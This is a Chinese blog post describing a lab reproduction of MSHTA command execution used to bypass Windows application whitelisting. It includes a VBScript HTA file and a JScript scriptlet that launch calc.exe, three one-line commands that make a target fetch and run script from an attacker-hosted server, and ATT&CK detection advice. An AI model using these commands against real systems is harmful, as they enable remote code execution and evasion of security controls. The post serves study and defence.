MSHTA命令执行——绕过应用白名单限制

最近复现了一个MSHTA命令执行的攻击,这里做个记录。

所需环境

这里使用了两台互相联通的电脑分别作为攻击机和靶机。

攻击机

  • Windows 10
  • phpstudy

靶机

  • Windows 10
  • powershell

背景&技术介绍

假设攻击者已经控制了一台内网主机,但是该主机存在应用白名单限制,因此,尝试通过MSHTA程序绕过限制。

百度百科对MSHTA简介如下:

mshta一般指mshta.exe。mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件。

百度百科对HTA的简介如下:

HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别。
HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多。它具有桌面程序的所有权限(读写文件、操作注册表等)。HTA本来就是被设计为桌面程序的。

ATT&CK官网对该技术的原理说明如下:

攻击者可能会通过受信任的 Windows 实用程序滥用 mshta.exe 来代理恶意 .hta 文件和 Javascript 或 VBScript 的执行。
Mshta.exe 是一种执行 Microsoft HTML 应用程序 (HTA) 文件的实用程序。 HTA 是使用与 Internet Explorer 相同的模型和技术执行的独立应用程序,但在浏览器之外。
Mshta.exe 可用于绕过不考虑其潜在用途的应用程序控制解决方案。 由于 mshta.exe 在 Internet Explorer 的安全上下文之外执行,因此它还可绕过浏览器安全设置。

大概总结一下,该技术的原理为:

  • MSHTA是Windows内置的一个程序,主要用于执行HTA程序
  • MSHTA可以直接执行远端的HTA
  • HTA程序可以包括VBScript、JScript等代码,以此执行命令
  • 通过MSHTA运行HTA程序执行命令的方式,可以加载本地受限应用,以此绕过应用白名单限制
  • MSHTA在浏览器外部运行,因此也可绕过浏览器安全设置

攻击实施

编写恶意HTA程序

首先,编写恶意的HTA程序,保存为m.hta,hta文件内容如下:

<html>
<head>
<script language="VBScript"> 
    Sub RunProgram
        Set objShell = CreateObject("Wscript.Shell")
        objShell.Run "calc.exe"
    End Sub
RunProgram()
</script>
</head> 
<body>
    Nothing to see here..
</body>
</html>

HTA程序本质上是一个类似HTML的程序,但其中可以嵌入VBScript代码。
这里嵌入了一段VBScript代码,定义了一个程序,程序第一行创建一个shell对象,第二行利用该对象运行计算器程序(当然,VBScript能做的不仅仅是这些,这里只是以计算器做一个例子,如果想要实施更加复杂的攻击,将第二行的命令换成想要执行的shell脚本即可)

HTA还可以嵌入JScript脚本,因此,上面的程序也可以写成下面这样,但注意,需要保存为m.sct

<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>

<public>
    <method name="Exec"></method>
</public>

<script language="JScript">
<![CDATA[
    function Exec() {
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    }
]]>
</script>
</scriptlet>

其实现的功能和前一个文件一样,但这里是使用JScript建立一个ActiveX对象,再通过该对象运行命令

上线恶意程序

文件编写完毕之后,需要将其上线以方便后续攻击。

这里直接安装phpstudy,去官网下载傻瓜式安装即可,安装完毕后,会在安装目录下有一个www文件夹,将我们刚刚编写的恶意程序放进去即可。

然后打开phpstudy,启动所有服务,完成程序上线。

在靶机上运行命令

进入到靶机中,打开powershell,运行以下命令(其中的攻击机地址可以是IP或者域名):

mshta.exe http://攻击机地址/m.hta

或者命令:

/cmd /c mshta.exe javascript:a=(GetObject("script:http://攻击机地址/m.sct")).Exec();close();

或者命令:

mshta vbscript:Close(Execute("GetObject(""script:https[:]//攻击机地址/m[.]sct"")"))

攻击完成

攻击效果

可以看到,命令运行后,靶机电脑上的计算器程序就直接启动运行了:
(图后面再补)

如果将恶意的HTA程序中的脚本换成其他命令,则可以实施更加复杂且危险的攻击。

预防措施

在ATT&CK中也给出了一定的预防措施:

  • 使用进程监控来监控 mshta.exe 的执行和参数。 在命令行中查找执行原始或混淆脚本的 mshta.exe。 将最近对 mshta.exe 的调用与已知良好参数和已执行的 .hta 文件的先前历史进行比较,以确定异常和潜在的对抗活动。 在 mshta.exe 调用之前和之后使用的命令参数也可能有助于确定正在执行的 .hta 文件的来源和目的。
  • 监视 HTA 文件的使用。 如果它们通常不在环境中使用,则它们的执行可能是可疑的

参考资料

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 217,406评论 6 503
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,732评论 3 393
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 163,711评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,380评论 1 293
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,432评论 6 392
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,301评论 1 301
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,145评论 3 418
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,008评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,443评论 1 314
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,649评论 3 334
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,795评论 1 347
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,501评论 5 345
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,119评论 3 328
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,731评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,865评论 1 269
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,899评论 2 370
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,724评论 2 354

推荐阅读更多精彩内容